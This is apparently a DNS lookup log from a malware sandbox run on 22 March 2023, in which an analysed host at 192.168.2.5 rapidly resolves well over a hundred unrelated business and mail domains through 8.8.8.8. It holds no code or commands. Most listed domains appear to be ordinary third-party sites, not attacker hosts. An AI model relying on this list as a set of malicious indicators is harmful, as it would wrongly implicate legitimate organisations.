                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.166877985 CET8.8.8.8192.168.2.50x3b0eNo error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.171243906 CET8.8.8.8192.168.2.50x57cbName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.181739092 CET8.8.8.8192.168.2.50xa2efNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.181739092 CET8.8.8.8192.168.2.50xa2efNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.363722086 CET8.8.8.8192.168.2.50xbb74No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.470627069 CET8.8.8.8192.168.2.50x8228Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.497829914 CET8.8.8.8192.168.2.50x7a20No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.704660892 CET8.8.8.8192.168.2.50xe133No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.756131887 CET8.8.8.8192.168.2.50x681eNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.787352085 CET8.8.8.8192.168.2.50xb7e0No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.787352085 CET8.8.8.8192.168.2.50xb7e0No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.802165985 CET8.8.8.8192.168.2.50xccacNo error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.835083008 CET8.8.8.8192.168.2.50xc597Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.867944956 CET8.8.8.8192.168.2.50xef9eNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.897569895 CET8.8.8.8192.168.2.50x5d47No error (0)valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.900691032 CET8.8.8.8192.168.2.50x51c5No error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.900691032 CET8.8.8.8192.168.2.50x51c5No error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.908255100 CET8.8.8.8192.168.2.50xcd2No error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.908255100 CET8.8.8.8192.168.2.50xcd2No error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.938498974 CET8.8.8.8192.168.2.50x884aNo error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.996313095 CET8.8.8.8192.168.2.50x39a2No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.996313095 CET8.8.8.8192.168.2.50x39a2No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.996313095 CET8.8.8.8192.168.2.50x39a2No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.996313095 CET8.8.8.8192.168.2.50x39a2No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.042853117 CET8.8.8.8192.168.2.50xe2ceNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.155419111 CET8.8.8.8192.168.2.50xf037Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.157812119 CET8.8.8.8192.168.2.50xb68dNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.157879114 CET8.8.8.8192.168.2.50xe18cName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.164043903 CET8.8.8.8192.168.2.50x327aNo error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.330686092 CET8.8.8.8192.168.2.50x82e1No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.357455969 CET8.8.8.8192.168.2.50x31adNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.375895023 CET8.8.8.8192.168.2.50xa1a4Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.384399891 CET8.8.8.8192.168.2.50xbab0No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.425929070 CET8.8.8.8192.168.2.50xf354No error (0)vivastay.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.425929070 CET8.8.8.8192.168.2.50xf354No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.425929070 CET8.8.8.8192.168.2.50xf354No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.425929070 CET8.8.8.8192.168.2.50xf354No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.437726974 CET8.8.8.8192.168.2.50x360aNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.437726974 CET8.8.8.8192.168.2.50x360aNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.458370924 CET8.8.8.8192.168.2.50x1faeNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.559390068 CET8.8.8.8192.168.2.50x69cdNo error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.603719950 CET8.8.8.8192.168.2.50xed5bServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.716025114 CET8.8.8.8192.168.2.50x54edNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.716758013 CET8.8.8.8192.168.2.50xc17dNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.829205990 CET8.8.8.8192.168.2.50x882bNo error (0)cjcagent.com157.112.187.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.882253885 CET8.8.8.8192.168.2.50xc597Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.946782112 CET8.8.8.8192.168.2.50xca33No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.146759987 CET8.8.8.8192.168.2.50x2940No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.156837940 CET8.8.8.8192.168.2.50xa34fNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.307742119 CET8.8.8.8192.168.2.50xae9bNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.311191082 CET8.8.8.8192.168.2.50x5186No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.312078953 CET8.8.8.8192.168.2.50x27a9No error (0)invictus.pl193.107.88.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.324974060 CET8.8.8.8192.168.2.50xb2bNo error (0)fogra.com.pl85.128.55.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.446346045 CET8.8.8.8192.168.2.50x454No error (0)envogen.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.446346045 CET8.8.8.8192.168.2.50x454No error (0)envogen.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.470726013 CET8.8.8.8192.168.2.50x2e38Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.497221947 CET8.8.8.8192.168.2.50x1a20No error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.523379087 CET8.8.8.8192.168.2.50x4e8fNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.523379087 CET8.8.8.8192.168.2.50x4e8fNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.523379087 CET8.8.8.8192.168.2.50x4e8fNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.523379087 CET8.8.8.8192.168.2.50x4e8fNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.526398897 CET8.8.8.8192.168.2.50x2055No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.526398897 CET8.8.8.8192.168.2.50x2055No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.964709044 CET8.8.8.8192.168.2.50x6aa7No error (0)shiner.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.964709044 CET8.8.8.8192.168.2.50x6aa7No error (0)shiner.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.136040926 CET8.8.8.8192.168.2.50x5e93No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.186340094 CET8.8.8.8192.168.2.50xaf95No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.211941957 CET8.8.8.8192.168.2.50x6ab7No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.331533909 CET8.8.8.8192.168.2.50x54c7No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.332205057 CET8.8.8.8192.168.2.50x5a13No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.367582083 CET8.8.8.8192.168.2.50x5112No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.384543896 CET8.8.8.8192.168.2.50xd679No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.399334908 CET8.8.8.8192.168.2.50xac50No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.763828039 CET8.8.8.8192.168.2.50xfb5dServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.799875021 CET8.8.8.8192.168.2.50xfe6dNo error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.831213951 CET8.8.8.8192.168.2.50x11d3No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.831213951 CET8.8.8.8192.168.2.50x11d3No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.831213951 CET8.8.8.8192.168.2.50x11d3No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.831213951 CET8.8.8.8192.168.2.50x11d3No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.898721933 CET8.8.8.8192.168.2.50xc597Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.960843086 CET8.8.8.8192.168.2.50x4834No error (0)shesfit.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.960843086 CET8.8.8.8192.168.2.50x4834No error (0)shesfit.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.973958969 CET8.8.8.8192.168.2.50x778dNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.007489920 CET8.8.8.8192.168.2.50x56d1No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.036170959 CET8.8.8.8192.168.2.50x9b41No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.037029028 CET8.8.8.8192.168.2.50x139fNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.037029028 CET8.8.8.8192.168.2.50x139fNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.041393042 CET8.8.8.8192.168.2.50x1430No error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.041393042 CET8.8.8.8192.168.2.50x1430No error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.086988926 CET8.8.8.8192.168.2.50x8f54No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.087733984 CET8.8.8.8192.168.2.50xb490No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.097143888 CET8.8.8.8192.168.2.50xdce2No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.102895021 CET8.8.8.8192.168.2.50x286bNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.182959080 CET8.8.8.8192.168.2.50x52a0No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.182959080 CET8.8.8.8192.168.2.50x52a0No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.182959080 CET8.8.8.8192.168.2.50x52a0No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.427898884 CET8.8.8.8192.168.2.50x27c7No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.427898884 CET8.8.8.8192.168.2.50x27c7No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.443685055 CET8.8.8.8192.168.2.50x8293Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.478795052 CET8.8.8.8192.168.2.50x8072Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.509921074 CET8.8.8.8192.168.2.50x4063Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.525084972 CET8.8.8.8192.168.2.50x51dcNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.525084972 CET8.8.8.8192.168.2.50x51dcNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.611867905 CET8.8.8.8192.168.2.50x9858No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.673122883 CET8.8.8.8192.168.2.50x662bNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.704754114 CET8.8.8.8192.168.2.50x3662No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.704754114 CET8.8.8.8192.168.2.50x3662No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.874288082 CET8.8.8.8192.168.2.50x92dcServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.927454948 CET8.8.8.8192.168.2.50x840fNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.126478910 CET8.8.8.8192.168.2.50xd017No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.167968035 CET8.8.8.8192.168.2.50xf309No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.195899963 CET8.8.8.8192.168.2.50xe148No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.195899963 CET8.8.8.8192.168.2.50xe148No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.195899963 CET8.8.8.8192.168.2.50xe148No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.195899963 CET8.8.8.8192.168.2.50xe148No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.197932005 CET8.8.8.8192.168.2.50x9aabNo error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.249681950 CET8.8.8.8192.168.2.50x543No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.409993887 CET8.8.8.8192.168.2.50x45aaNo error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.409993887 CET8.8.8.8192.168.2.50x45aaNo error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.466576099 CET8.8.8.8192.168.2.50xa30fNo error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.479165077 CET8.8.8.8192.168.2.50x288dNo error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.479165077 CET8.8.8.8192.168.2.50x288dNo error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.564222097 CET8.8.8.8192.168.2.50x8f36No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.566495895 CET8.8.8.8192.168.2.50xb416Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.591419935 CET8.8.8.8192.168.2.50xc7d6No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.653260946 CET8.8.8.8192.168.2.50x3ceNo error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.653260946 CET8.8.8.8192.168.2.50x3ceNo error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.683244944 CET8.8.8.8192.168.2.50xb593No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.704751968 CET8.8.8.8192.168.2.50x8e4aNo error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.704751968 CET8.8.8.8192.168.2.50x8e4aNo error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.706959963 CET8.8.8.8192.168.2.50x8870No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.826515913 CET8.8.8.8192.168.2.50x52f1No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.882049084 CET8.8.8.8192.168.2.50x92dcServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.883196115 CET8.8.8.8192.168.2.50x647cNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.883196115 CET8.8.8.8192.168.2.50x647cNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.883196115 CET8.8.8.8192.168.2.50x647cNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.950961113 CET8.8.8.8192.168.2.50x442fNo error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.990577936 CET8.8.8.8192.168.2.50xeb14No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.033202887 CET8.8.8.8192.168.2.50x9fe3No error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.059145927 CET8.8.8.8192.168.2.50x8dcbServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.088294029 CET8.8.8.8192.168.2.50x10e0No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.132158041 CET8.8.8.8192.168.2.50x1593No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.304266930 CET8.8.8.8192.168.2.50xad18No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.394632101 CET8.8.8.8192.168.2.50x5e45No error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.397912979 CET8.8.8.8192.168.2.50xac5aNo error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.397912979 CET8.8.8.8192.168.2.50xac5aNo error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.412782907 CET8.8.8.8192.168.2.50xe110No error (0)mail.protonmail.ch185.205.70.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.412782907 CET8.8.8.8192.168.2.50xe110No error (0)mail.protonmail.ch185.70.42.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.412782907 CET8.8.8.8192.168.2.50xe110No error (0)mail.protonmail.ch176.119.200.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.446923018 CET8.8.8.8192.168.2.50x5822No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.446971893 CET8.8.8.8192.168.2.50x952dNo error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.447841883 CET8.8.8.8192.168.2.50x4ee4No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.477787018 CET8.8.8.8192.168.2.50xc5a0No error (0)semuk.com52.128.23.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.501125097 CET8.8.8.8192.168.2.50x2af4No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.501215935 CET8.8.8.8192.168.2.50xee39No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.547276020 CET8.8.8.8192.168.2.50x9168No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.798470974 CET8.8.8.8192.168.2.50x7c31Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.837344885 CET8.8.8.8192.168.2.50x174fNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.837395906 CET8.8.8.8192.168.2.50xda73No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.881494045 CET8.8.8.8192.168.2.50x92dcServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
